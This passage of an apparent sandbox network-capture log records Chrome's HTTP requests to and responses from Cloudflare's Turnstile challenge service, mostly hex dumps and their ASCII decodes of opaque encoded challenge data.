                                                                                      2024-11-15 17:08:59 UTC1039INData Raw: 69 6e 2b 42 58 33 74 6f 61 6f 74 53 6b 33 4b 52 56 46 61 50 5a 4a 36 66 66 6d 75 59 58 35 78 76 6e 47 52 78 58 36 64 6f 67 59 79 69 68 48 32 50 6b 72 46 38 6f 61 53 46 64 49 6d 70 73 59 39 34 73 72 4a 2b 6d 72 4b 54 6d 5a 4f 79 70 36 57 64 75 37 2f 4b 6c 59 4f 61 75 38 79 6b 77 73 32 4c 6f 37 50 4d 6f 73 71 4d 78 70 71 38 76 4a 66 64 72 2b 4b 77 30 74 79 64 6d 64 65 67 71 63 58 6d 74 63 58 6b 7a 38 53 78 34 65 6e 49 39 75 33 67 7a 62 54 76 78 66 72 30 37 50 72 67 76 4f 44 32 39 4e 54 36 42 50 54 6f 42 77 44 75 31 77 58 51 37 4d 2f 30 37 75 6b 58 46 68 54 50 2b 64 48 53 30 78 58 66 2f 67 72 63 34 64 34 45 2b 68 4c 34 49 4f 44 70 49 68 63 42 2f 50 6f 76 48 51 63 43 4d 67 6f 6c 41 7a 49 30 2b 50 49 2b 46 2f 55 62 48 41 44 37 41 7a 63 51 43 41 55 72 49 67 63
                                                                                      Data Ascii: in+BX3toaotSk3KRVFaPZJ6ffmuYX5xvnGRxX6dogYyihH2PkrF8oaSFdImpsY94srJ+mrKTmZOyp6Wdu7/KlYOau8ykws2Lo7PMosqMxpq8vJfdr+Kw0tydmdegqcXmtcXkz8Sx4enI9u3gzbTvxfr07PrgvOD29NT6BPToBwDu1wXQ7M/07ukXFhTP+dHS0xXf/grc4d4E+hL4IODpIhcB/PovHQcCMgolAzI0+PI+F/UbHAD7AzcQCAUrIgc
                                                                                      2024-11-15 17:08:59 UTC1369INData Raw: 4e 57 46 71 57 6f 4a 68 7a 58 35 65 64 59 6f 43 61 5a 6e 79 55 6c 32 71 42 6e 33 36 76 70 4a 46 75 61 37 4b 65 72 6f 36 76 68 4a 4a 32 65 5a 36 51 6e 63 47 4c 77 49 36 44 72 37 36 37 6e 4b 53 30 69 35 6e 47 79 71 75 4a 6b 64 4b 74 71 71 71 56 74 71 6e 54 75 39 6e 59 74 73 37 4d 71 39 71 63 6f 4e 79 66 32 71 48 57 35 75 72 4c 78 62 2f 4e 7a 75 58 4d 75 2b 44 52 73 39 54 45 74 73 36 35 72 76 33 63 39 62 76 35 34 37 2f 41 37 74 44 30 33 67 55 42 32 41 77 44 35 77 48 43 2b 51 58 69 7a 51 58 50 7a 2b 66 70 42 41 59 62 47 4f 62 58 45 75 6f 4d 39 65 4d 5a 38 42 7a 32 2f 66 72 38 49 52 6f 45 49 52 45 50 45 4f 73 75 48 6a 6a 7a 4e 2f 41 50 2b 43 67 57 46 41 38 63 43 77 45 66 50 42 34 32 49 41 6b 53 49 55 59 66 4c 45 4e 49 53 68 42 4c 4d 30 74 42 45 52 59 31 53 43
                                                                                      Data Ascii: NWFqWoJhzX5edYoCaZnyUl2qBn36vpJFua7Kero6vhJJ2eZ6QncGLwI6Dr767nKS0i5nGyquJkdKtqqqVtqnTu9nYts7Mq9qcoNyf2qHW5urLxb/NzuXMu+DRs9TEts65rv3c9bv547/A7tD03gUB2AwD5wHC+QXizQXPz+fpBAYbGObXEuoM9eMZ8Bz2/fr8IRoEIREPEOsuHjjzN/AP+CgWFA8cCwEfPB42IAkSIUYfLENIShBLM0tBERY1SC
                                                                                      2024-11-15 17:08:59 UTC1369INData Raw: 6d 34 43 68 65 4a 52 37 71 4a 4b 69 61 4b 31 72 70 5a 42 73 73 59 61 68 6a 71 53 30 63 36 4f 4c 75 4c 47 52 64 70 56 33 73 36 79 64 6c 72 4f 64 74 5a 4b 39 6f 36 61 33 6d 70 62 41 68 71 66 51 73 73 7a 4d 6e 5a 62 44 7a 71 47 53 6c 61 72 56 73 36 79 71 77 61 43 72 76 4d 54 5a 75 4b 62 52 71 4b 65 6a 77 73 48 69 71 36 2f 50 7a 38 33 52 35 4d 4c 57 35 63 6e 30 74 50 76 4e 2b 2f 33 74 31 74 7a 76 31 76 48 55 77 50 50 48 79 67 4c 6f 42 67 2f 6f 36 73 6b 43 30 64 48 75 35 2b 50 78 2b 76 54 59 44 41 77 58 45 42 49 42 41 41 30 53 4a 52 55 6e 47 78 62 32 42 76 6e 6d 2f 41 6b 69 42 50 34 47 45 77 67 5a 45 7a 73 59 48 44 66 30 50 42 45 39 4f 7a 77 62 51 54 38 54 4e 44 6f 6a 50 68 70 45 48 43 30 4b 4c 67 34 2f 51 46 59 71 4c 69 38 6a 44 42 4d 54 55 6c 59 72 53 31 59
                                                                                      Data Ascii: m4CheJR7qJKiaK1rpZBssYahjqS0c6OLuLGRdpV3s6ydlrOdtZK9o6a3mpbAhqfQsszMnZbDzqGSlarVs6yqwaCrvMTZuKbRqKejwsHiq6/Pz83R5MLW5cn0tPvN+/3t1tzv1vHUwPPHygLoBg/o6skC0dHu5+Px+vTYDAwXEBIBAA0SJRUnGxb2Bvnm/AkiBP4GEwgZEzsYHDf0PBE9OzwbQT8TNDojPhpEHC0KLg4/QFYqLi8jDBMTUlYrS1Y
                                                                                      2024-11-15 17:08:59 UTC1369INData Raw: 4b 4a 68 67 58 39 37 71 49 69 6d 69 57 69 6a 6e 36 42 75 63 4b 32 46 6d 37 6c 7a 72 48 35 34 74 59 32 78 77 58 75 31 78 59 43 39 6c 61 50 4a 67 37 33 42 69 4d 57 63 6b 4b 2f 51 30 6f 36 77 70 64 47 53 72 64 79 35 75 62 79 30 6e 37 47 6a 75 61 4b 75 30 62 6e 43 34 4e 7a 42 74 74 33 6d 72 66 43 6f 76 73 2f 41 72 73 58 52 31 63 66 46 30 74 6e 38 76 37 69 39 7a 4e 50 45 2f 51 54 6a 43 76 34 44 33 4e 58 5a 43 2f 37 59 41 74 37 54 2f 76 62 65 37 64 41 55 46 4f 73 52 35 2f 62 76 2f 52 37 36 46 4f 30 51 4b 41 54 34 2b 41 45 65 47 75 55 71 44 41 37 6f 36 68 2f 39 45 68 55 56 39 44 62 32 48 54 51 2b 48 54 62 37 4f 69 51 41 41 67 51 52 4e 53 59 61 4d 79 30 6e 4c 78 63 47 53 7a 34 7a 45 45 78 44 49 45 55 4c 53 56 49 70 54 46 63 33 55 56 31 4f 57 44 4e 5a 57 53 45 67
                                                                                      Data Ascii: KJhgX97qIimiWijn6BucK2Fm7lzrH54tY2xwXu1xYC9laPJg73BiMWckK/Q0o6wpdGSrdy5uby0n7GjuaKu0bnC4NzBtt3mrfCovs/ArsXR1cfF0tn8v7i9zNPE/QTjCv4D3NXZC/7YAt7T/vbe7dAUFOsR5/bv/R76FO0QKAT4+AEeGuUqDA7o6h/9EhUV9Db2HTQ+HTb7OiQAAgQRNSYaMy0nLxcGSz4zEExDIEULSVIpTFc3UV1OWDNZWSEg
                                                                                      2024-11-15 17:08:59 UTC1369INData Raw: 69 41 66 58 46 74 71 59 71 6a 62 62 4a 33 72 4c 4a 36 65 4c 69 4c 63 71 74 2f 6e 49 4b 55 6b 35 43 49 67 59 54 4a 69 4c 6d 4d 76 34 6d 44 6b 4c 36 50 77 4d 2f 45 6c 4c 6e 52 30 73 61 33 75 36 36 31 7a 36 2f 4d 6f 4c 76 46 34 71 58 56 78 4b 47 2f 77 74 6d 72 78 65 37 6c 37 62 50 66 77 37 47 7a 73 76 6e 36 36 2f 66 77 74 72 2f 75 76 73 7a 38 7a 2f 6a 35 77 73 4d 46 35 39 62 74 36 64 6a 67 2b 65 45 4b 35 63 33 70 38 75 63 4b 2b 2b 58 34 44 77 44 36 2b 76 76 79 49 2f 51 41 37 77 49 43 48 51 63 63 43 42 2f 70 4d 41 72 39 2b 6a 41 48 41 78 4d 77 45 44 72 31 4e 42 63 59 2f 55 45 63 44 68 4d 7a 46 44 6b 66 52 42 67 36 53 69 45 66 46 77 38 68 48 79 77 53 51 43 38 4e 52 56 51 30 4e 53 77 6f 4c 31 35 4a 55 7a 42 68 55 56 55 36 51 6d 49 33 4e 7a 56 5a 58 54 34 34 5a
                                                                                      Data Ascii: iAfXFtqYqjbbJ3rLJ6eLiLcqt/nIKUk5CIgYTJiLmMv4mDkL6PwM/ElLnR0sa3u661z6/MoLvF4qXVxKG/wtmrxe7l7bPfw7Gzsvn66/fwtr/uvsz8z/j5wsMF59bt6djg+eEK5c3p8ucK++X4DwD6+vvyI/QA7wICHQccCB/pMAr9+jAHAxMwEDr1NBcY/UEcDhMzFDkfRBg6SiEfFw8hHywSQC8NRVQ0NSwoL15JUzBhUVU6QmI3NzVZXT44Z
                                                                                      2024-11-15 17:08:59 UTC1369INData Raw: 69 6d 4b 31 32 68 4a 6d 78 6b 71 61 71 66 4a 4f 32 72 49 79 78 6d 62 57 45 65 38 75 44 78 61 53 70 76 59 36 39 7a 4b 79 51 30 59 7a 46 70 4d 57 55 32 35 75 61 78 37 33 58 6e 64 4c 58 32 61 4b 77 32 74 7a 6b 30 71 4c 6e 76 37 6a 62 35 75 6a 61 33 61 7a 73 73 4f 6e 77 32 76 54 45 74 2f 6e 4a 39 4c 37 59 34 50 33 45 32 39 45 44 78 51 6e 5a 41 4d 71 2f 31 75 6a 4f 2f 75 55 56 44 42 48 2b 41 67 37 72 39 51 51 53 32 51 73 4f 47 4e 30 54 47 4f 44 33 47 78 48 77 46 76 30 61 36 4e 38 77 35 79 6f 4a 44 69 4c 79 49 6a 45 52 39 44 62 77 4b 67 6b 71 2b 45 41 41 2f 69 77 69 4f 68 64 48 4e 54 38 63 53 7a 78 41 53 55 63 2b 52 79 51 6c 53 55 31 53 4d 55 39 4e 57 43 70 4d 47 44 52 4d 57 69 46 4b 5a 42 73 67 50 43 46 68 4e 56 5a 55 61 53 67 33 50 6d 73 77 62 30 6c 6f 62 45
                                                                                      Data Ascii: imK12hJmxkqaqfJO2rIyxmbWEe8uDxaSpvY69zKyQ0YzFpMWU25uax73XndLX2aKw2tzk0qLnv7jb5uja3azssOnw2vTEt/nJ9L7Y4P3E29EDxQnZAMq/1ujO/uUVDBH+Ag7r9QQS2QsOGN0TGOD3GxHwFv0a6N8w5yoJDiLyIjER9DbwKgkq+EAA/iwiOhdHNT8cSzxASUc+RyQlSU1SMU9NWCpMGDRMWiFKZBsgPCFhNVZUaSg3Pmswb0lobE
                                                                                      2024-11-15 17:08:59 UTC1369INData Raw: 74 59 69 74 73 33 31 30 75 37 6d 43 6f 4b 61 2b 68 58 79 70 77 72 57 73 75 38 58 4a 79 73 44 48 6b 62 37 4a 7a 36 75 30 79 4e 48 56 74 4d 7a 59 32 61 7a 51 32 38 33 45 30 39 36 37 78 4e 72 69 71 61 76 6e 35 73 50 45 35 4f 76 47 34 75 6a 76 79 72 66 71 38 2b 58 32 37 66 66 70 30 4f 2f 36 2f 4f 37 34 2b 38 62 55 2b 41 55 47 32 4f 30 48 34 73 38 44 43 67 37 67 43 41 37 56 7a 42 51 54 42 75 67 52 46 4e 34 42 45 78 6f 64 44 78 51 65 49 69 4d 62 49 78 59 42 49 53 67 61 44 53 51 73 48 68 55 6c 4d 54 49 4a 4c 54 4c 36 47 53 77 34 46 42 6b 69 4f 67 4d 6c 51 44 38 79 4a 54 68 43 52 68 31 42 52 79 4d 37 51 45 74 4f 54 30 68 4f 55 55 64 4d 55 78 73 39 54 56 51 65 49 45 4e 64 58 6a 46 62 58 79 63 39 57 6d 4e 57 50 57 42 6e 61 6d 74 6b 61 31 63 30 5a 6d 39 4d 57 57 39
                                                                                      Data Ascii: tYits310u7mCoKa+hXypwrWsu8XJysDHkb7Jz6u0yNHVtMzY2azQ283E0967xNriqavn5sPE5OvG4ujvyrfq8+X27ffp0O/6/O74+8bU+AUG2O0H4s8DCg7gCA7VzBQTBugRFN4BExodDxQeIiMbIxYBISgaDSQsHhUlMTIJLTL6GSw4FBkiOgMlQD8yJThCRh1BRyM7QEtOT0hOUUdMUxs9TVQeIENdXjFbXyc9WmNWPWBnamtka1c0Zm9MWW9
                                                                                      2024-11-15 17:08:59 UTC1369INData Raw: 35 44 43 75 4b 4e 36 68 72 62 44 6c 35 37 49 72 4d 69 2f 30 72 79 50 76 62 61 72 30 4e 47 6b 30 4a 4b 7a 72 4e 4f 72 73 39 72 51 32 73 33 54 70 71 50 52 79 72 2f 6b 35 62 6a 64 35 36 37 72 70 65 69 6e 77 4f 76 44 79 2f 44 4b 39 38 62 64 76 73 33 71 32 74 47 36 7a 66 4b 2b 30 51 4c 32 42 4e 66 65 43 65 49 4a 41 41 2f 38 33 67 34 4e 36 51 30 59 44 78 54 6d 2f 68 77 4f 47 42 41 54 48 4f 38 4f 45 79 44 79 2b 69 58 36 4a 52 77 62 47 66 6b 71 4b 51 49 70 4e 52 55 77 42 68 73 34 4b 6a 51 73 39 7a 6a 32 4f 6a 41 74 45 54 4d 37 4e 50 6f 47 53 44 70 45 50 53 31 49 48 54 39 48 51 41 63 54 51 31 41 6c 52 30 39 4a 44 78 70 63 54 6c 68 51 53 31 77 78 55 31 74 56 47 79 64 58 5a 44 6c 62 59 31 34 6a 4c 6e 42 69 62 47 52 6a 63 45 56 6e 62 32 6f 76 4f 32 74 34 54 57 39 33
                                                                                      Data Ascii: 5DCuKN6hrbDl57IrMi/0ryPvbar0NGk0JKzrNOrs9rQ2s3TpqPRyr/k5bjd567rpeinwOvDy/DK98bdvs3q2tG6zfK+0QL2BNfeCeIJAA/83g4N6Q0YDxTm/hwOGBATHO8OEyDy+iX6JRwbGfkqKQIpNRUwBhs4KjQs9zj2OjAtETM7NPoGSDpEPS1IHT9HQAcTQ1AlR09JDxpcTlhQS1wxU1tVGydXZDlbY14jLnBibGRjcEVnb2ovO2t4TW93


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      20192.168.2.1662642104.18.94.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:09:00 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1093189025:1731688839:x1kRv33ivkzJcCIS_vRAZkT6bqP_ctXOxZXsKsV2PSM/8e30d87ec8a16c3f/sSzRqdTgFUcq5RjMOQYSTAVuj6rBGacRDng0LKDFlh0-1731690531-1.1.1.1-0TLD7tDIxT0D0EQK8__TG0ore5iDxu0qcQttWVAtka.Bgsl__SU0L0riobFnqkzZ HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:09:00 UTC379INHTTP/1.1 404 Not Found
                                                                                      Date: Fri, 15 Nov 2024 17:09:00 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 7
                                                                                      Connection: close
                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      cf-chl-out: h9qN/jOYx+5eZJhWNxZpiN0/zKZ4Xy5BRek=$5y6F4hU1IgtRhVKA
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d8b41f09e8f9-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:09:00 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                      Data Ascii: invalid


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      21192.168.2.1662643104.18.95.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:09:02 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1093189025:1731688839:x1kRv33ivkzJcCIS_vRAZkT6bqP_ctXOxZXsKsV2PSM/8e30d87ec8a16c3f/sSzRqdTgFUcq5RjMOQYSTAVuj6rBGacRDng0LKDFlh0-1731690531-1.1.1.1-0TLD7tDIxT0D0EQK8__TG0ore5iDxu0qcQttWVAtka.Bgsl__SU0L0riobFnqkzZ HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 34221
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      CF-Challenge: sSzRqdTgFUcq5RjMOQYSTAVuj6rBGacRDng0LKDFlh0-1731690531-1.1.1.1-0TLD7tDIxT0D0EQK8__TG0ore5iDxu0qcQttWVAtka.Bgsl__SU0L0riobFnqkzZ
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Origin: https://challenges.cloudflare.com
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/662em/0x4AAAAAAA0CO9LzmGdRnkcZ/auto/fbE/normal/auto/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:09:02 UTC16384OUTData Raw: 76 5f 38 65 33 30 64 38 37 65 63 38 61 31 36 63 33 66 3d 59 35 42 49 24 41 6a 61 43 31 43 46 43 6a 6e 6a 55 39 4f 39 7a 4e 52 39 37 39 35 49 69 34 66 52 6a 4f 39 2d 49 52 6e 39 5a 39 71 34 39 6c 39 38 7a 39 66 34 73 31 6a 54 32 6c 39 66 56 52 51 7a 43 33 41 78 39 6a 6c 34 6a 62 39 46 71 6a 70 7a 79 39 63 57 39 55 33 6a 57 39 74 34 79 33 33 31 49 7a 42 6a 63 39 39 43 43 67 71 59 41 53 4d 6f 39 4f 45 46 42 6a 58 46 41 2d 41 55 41 79 49 62 71 6a 53 46 46 6a 66 33 39 58 24 44 4e 67 48 39 41 35 39 4e 24 42 39 76 70 37 50 35 70 79 6f 43 33 39 48 34 53 52 37 6e 25 32 62 2b 79 43 61 5a 6a 39 2b 46 78 32 73 56 4a 24 42 34 39 66 24 42 39 63 75 4f 31 35 49 6e 39 6b 49 6a 48 67 2d 7a 79 48 74 47 2d 45 4c 6c 39 48 79 32 76 35 57 50 67 74 33 67 2d 4a 54 69 64 37 6e 50
                                                                                      Data Ascii: v_8e30d87ec8a16c3f=Y5BI$AjaC1CFCjnjU9O9zNR9795Ii4fRjO9-IRn9Z9q49l98z9f4s1jT2l9fVRQzC3Ax9jl4jb9Fqjpzy9cW9U3jW9t4y331IzBjc99CCgqYASMo9OEFBjXFA-AUAyIbqjSFFjf39X$DNgH9A59N$B9vp7P5pyoC39H4SR7n%2b+yCaZj9+Fx2sVJ$B49f$B9cuO15In9kIjHg-zyHtG-ELl9Hy2v5WPgt3g-JTid7nP
                                                                                      2024-11-15 17:09:02 UTC16384OUTData Raw: 33 63 42 6a 31 31 79 39 39 41 64 44 39 4e 39 62 42 39 43 39 7a 6e 47 34 43 39 7a 39 73 4a 39 5a 34 51 31 6a 54 33 36 52 61 33 73 4c 77 62 68 66 50 73 61 6a 2b 4a 37 39 4e 33 6a 6d 34 4e 6f 58 46 5a 6c 46 39 49 52 38 31 66 33 53 33 41 43 39 4d 39 46 34 39 42 6a 48 39 4c 71 73 71 39 2d 43 62 49 52 52 6a 62 39 73 49 39 41 6a 4b 33 59 6b 56 2b 49 46 39 4c 71 39 6c 39 41 49 78 6e 6a 44 6a 4d 35 66 54 41 6e 6a 32 39 2b 39 6a 51 56 77 39 59 33 39 68 6a 6f 68 6e 34 39 6d 6a 4f 39 53 34 41 68 6b 51 34 7a 39 41 42 6a 31 4c 4e 34 41 6d 6a 56 65 4b 33 6a 45 56 74 49 6e 33 4e 70 6a 4f 62 78 39 42 2b 6a 43 39 66 39 4a 33 6a 50 39 2b 39 39 46 6a 52 39 47 76 6a 49 6a 50 70 46 49 6a 49 39 6e 39 7a 39 4a 6e 6a 61 39 79 4d 73 34 63 56 39 31 33 39 31 33 4e 39 4e 33 63 6e 39
                                                                                      Data Ascii: 3cBj11y99AdD9N9bB9C9znG4C9z9sJ9Z4Q1jT36Ra3sLwbhfPsaj+J79N3jm4NoXFZlF9IR81f3S3AC9M9F49BjH9Lqsq9-CbIRRjb9sI9AjK3YkV+IF9Lq9l9AIxnjDjM5fTAnj29+9jQVw9Y39hjohn49mjO9S4AhkQ4z9ABj1LN4AmjVeK3jEVtIn3NpjObx9B+jC9f9J3jP9+99FjR9GvjIjPpFIjI9n9z9Jnja9yMs4cV913913N9N3cn9
                                                                                      2024-11-15 17:09:02 UTC1453OUTData Raw: 6f 6f 7a 67 49 31 4b 63 38 33 6f 33 73 67 38 2d 51 68 57 65 79 33 70 24 51 6c 51 4e 53 59 34 69 39 39 43 45 24 41 76 34 4e 79 39 45 4f 70 61 4e 4a 39 77 49 68 41 67 73 4f 6b 2d 63 42 37 45 39 4a 45 7a 36 31 71 6a 58 76 30 33 52 6c 4f 74 39 4a 4f 4f 7a 4e 77 49 46 34 41 45 39 4f 39 63 54 66 34 4d 4e 51 46 4b 61 4b 55 4d 76 35 43 41 6d 6a 56 42 67 50 52 63 41 4a 46 47 65 78 64 39 47 39 42 35 4f 43 39 41 69 6d 6c 35 53 65 73 33 62 55 6a 61 39 4b 49 39 65 54 50 6a 79 48 45 6c 4e 70 49 52 39 78 36 6a 43 6a 58 63 38 2b 30 54 6a 48 57 50 42 73 54 6a 46 49 63 41 41 33 6a 74 39 74 47 71 32 4f 39 30 69 5a 67 70 62 59 6a 67 43 73 2b 49 6f 43 6f 33 52 39 38 66 7a 43 7a 6f 41 39 4e 57 53 70 43 68 39 76 6e 6b 41 59 61 39 47 39 2d 67 48 30 73 4a 75 6d 61 77 4a 6a 38 79
                                                                                      Data Ascii: oozgI1Kc83o3sg8-QhWey3p$QlQNSY4i99CE$Av4Ny9EOpaNJ9wIhAgsOk-cB7E9JEz61qjXv03RlOt9JOOzNwIF4AE9O9cTf4MNQFKaKUMv5CAmjVBgPRcAJFGexd9G9B5OC9Aiml5Ses3bUja9KI9eTPjyHElNpIR9x6jCjXc8+0TjHWPBsTjFIcAA3jt9tGq2O90iZgpbYjgCs+IoCo3R98fzCzoA9NWSpCh9vnkAYa9G9-gH0sJumawJj8y
                                                                                      2024-11-15 17:09:03 UTC1361INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:09:03 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Content-Length: 4552
                                                                                      Connection: close
                                                                                      cf-chl-out-s: z4i06DtfxXgnfa/dO6Cp5QAdd/0zO/U9unxqxdqiXYNFYcUdBhzZ4uN7jO9ztnIPUp8D6+ejnV6HWTv+YyzwSYGKLpcu7FZA9UnguSWFhfNQ+X367BxEutyPDDTCACTFIhAP80r1xm0hwzgntNO2py7aGqw3uhyJAHCfD9vC662J+b9g/hTiuN8SpxbWbf6sRPs5MvV+iR0RkypTw3737H7iWk1lT0TgCL6gnphE6XzjR+Vkq0apZpq8YlLAtr5JQtyMUhsJIramd3MbOdK6RAzVvMZ2kdNrXS0/dCNpk9r9agUHWz5qrd6otTgpjrZ7Ce6DEQNFv6NvfKvAqxPGd5uT2D6/Cliha/+o5KqEphKLMGRjI9skkuo2nphoE5rdGseuHiimHsFN0SYLgPyJD4PxqzntnSEnzgd9LWhQ7QjQy+YO+9NBYUPobkxGQO0ftC1+wk1nO1ILyo+Qu5kA5rU4948InL68pmj5frpiWlSctoadz7/UxaNWcXr5SSTP7nE2v4sy4cv3kN8eQ2G+C2FLq2KG1BQ1XlYZcGS4Be/UJS9xJBWVfDjd69Qp49hIaHa33Vznj6STQ7HoYm/EOuJnISLguL6wNGjiq63+3zUMAMYs1iKDfhssM7ve9FPKSaSgRpB0XsCsi9vBmb9Ks/J1YupUivoL6vkfkbu7kzgJWhoGbr49qyNHkazMEpUPJjvDVrfCQtS2bh+eqcFsG8Dl2dD8etBpWUvnSnJJMBw+knyyS8/yle51KfY8Igj3nKtWW0olLg7BmjNKYH9HI/kNHwsqFyrVv0GEVGr95Tdysfi+53QSVDx3w5B42uQY/5NIsa/HQXVEOzUDhzNKlwIph6kf29yvDrlQUROBIR4fxKxjiwJz4KUteJV3UYVa2TVhbLRhCGGTlW5Rb81zDOV/BoujtPfYanvkPcQDsDqr58hZZ+V5ceqc3ndwofoxwlNe3YmxOU9A+gtqSF+k9r55kpmxHyA=$+mwifAPesqm5V4C0
                                                                                      cf-chl-out: nWEk+2WZ7IDFTAMlnPauEgCuQ1Lq2lEvkSFzdxBYf019Jvh9zv7XudASlOB+SAtL8QV2zw/ZTg0Rr8NL2Wz1gABt4IKEMKtNfjTqeF7SfoKnVuvRE0aAz8s=$XMYMmmAFcCjeZwI4
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d8c52fd6ddb2-DFW
                                                                                      2024-11-15 17:09:03 UTC32INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                      Data Ascii: alt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:09:03 UTC1345INData Raw: 69 6e 2b 42 58 33 74 6f 61 6f 74 53 6b 33 4b 52 56 46 61 50 5a 4a 36 65 6a 34 43 5a 67 34 75 66 6e 35 32 6f 6c 35 78 6a 6c 59 53 57 5a 35 71 77 6b 61 61 75 66 59 75 58 63 37 57 47 6d 4a 47 4c 72 62 4b 56 6a 37 4f 54 6e 4c 57 33 67 4c 61 48 6f 62 66 4b 6d 38 57 2b 6f 38 65 6d 6e 61 65 4d 70 71 4c 4a 6a 37 66 45 72 62 4f 5a 6c 74 37 68 79 70 75 62 35 4c 58 45 73 64 33 46 76 61 47 2f 37 4e 65 74 78 36 6e 66 36 4e 50 49 74 73 2b 79 31 4e 58 35 35 74 6e 62 33 4e 58 64 42 4c 72 44 38 2b 2f 45 31 38 66 6f 31 41 62 73 78 2b 6e 6c 2f 4f 2f 54 41 67 44 31 37 4e 44 6e 43 4e 50 7a 46 75 6e 6f 2b 50 4d 54 33 68 77 46 2b 76 6f 59 34 68 4d 4c 39 39 2f 6c 48 77 59 41 45 77 41 4a 44 43 51 68 4e 44 73 6e 42 76 55 74 4d 50 63 4f 4c 69 41 2b 48 52 30 76 47 41 59 6c 54 45 5a
                                                                                      Data Ascii: in+BX3toaotSk3KRVFaPZJ6ej4CZg4ufn52ol5xjlYSWZ5qwkaaufYuXc7WGmJGLrbKVj7OTnLW3gLaHobfKm8W+o8emnaeMpqLJj7fErbOZlt7hypub5LXEsd3FvaG/7Netx6nf6NPIts+y1NX55tnb3NXdBLrD8+/E18fo1Absx+nl/O/TAgD17NDnCNPzFuno+PMT3hwF+voY4hML99/lHwYAEwAJDCQhNDsnBvUtMPcOLiA+HR0vGAYlTEZ
                                                                                      2024-11-15 17:09:03 UTC1369INData Raw: 48 56 66 50 6c 39 33 56 46 35 65 5a 49 46 4b 59 47 68 66 6a 47 56 72 69 32 31 71 68 32 2b 44 5a 6c 57 5a 6b 58 56 35 63 58 52 30 6f 57 42 39 66 6e 39 65 70 59 57 5a 6c 59 78 39 65 58 32 4b 6a 62 4f 4d 69 5a 47 41 68 5a 43 55 71 33 5a 32 6a 61 32 36 69 34 35 2b 6c 4b 43 69 6c 73 57 77 75 71 65 66 72 4b 4c 41 6c 37 2b 6d 30 5a 4c 52 78 73 58 42 69 73 79 72 70 4b 65 7a 6c 61 66 68 74 62 4f 78 76 72 57 2f 70 75 4c 42 33 62 58 47 77 4d 2f 49 7a 4e 33 4e 75 2f 54 51 36 4c 4b 75 79 2b 33 58 35 65 37 49 79 4e 6a 63 39 50 6e 78 31 64 48 76 33 66 72 62 33 2b 77 41 32 63 66 71 36 4f 7a 67 36 2b 49 4f 35 4f 50 73 36 2b 63 4f 38 2f 66 65 32 50 63 53 33 68 48 36 37 79 49 54 39 68 73 4b 42 51 6f 4b 37 68 49 50 2f 51 45 4a 42 44 67 33 45 52 45 46 44 50 55 4c 4d 67 6f 5a
                                                                                      Data Ascii: HVfPl93VF5eZIFKYGhfjGVri21qh2+DZlWZkXV5cXR0oWB9fn9epYWZlYx9eX2KjbOMiZGAhZCUq3Z2ja26i45+lKCilsWwuqefrKLAl7+m0ZLRxsXBisyrpKezlafhtbOxvrW/puLB3bXGwM/IzN3Nu/TQ6LKuy+3X5e7IyNjc9Pnx1dHv3frb3+wA2cfq6Ozg6+IO5OPs6+cO8/fe2PcS3hH67yIT9hsKBQoK7hIP/QEJBDg3EREFDPULMgoZ
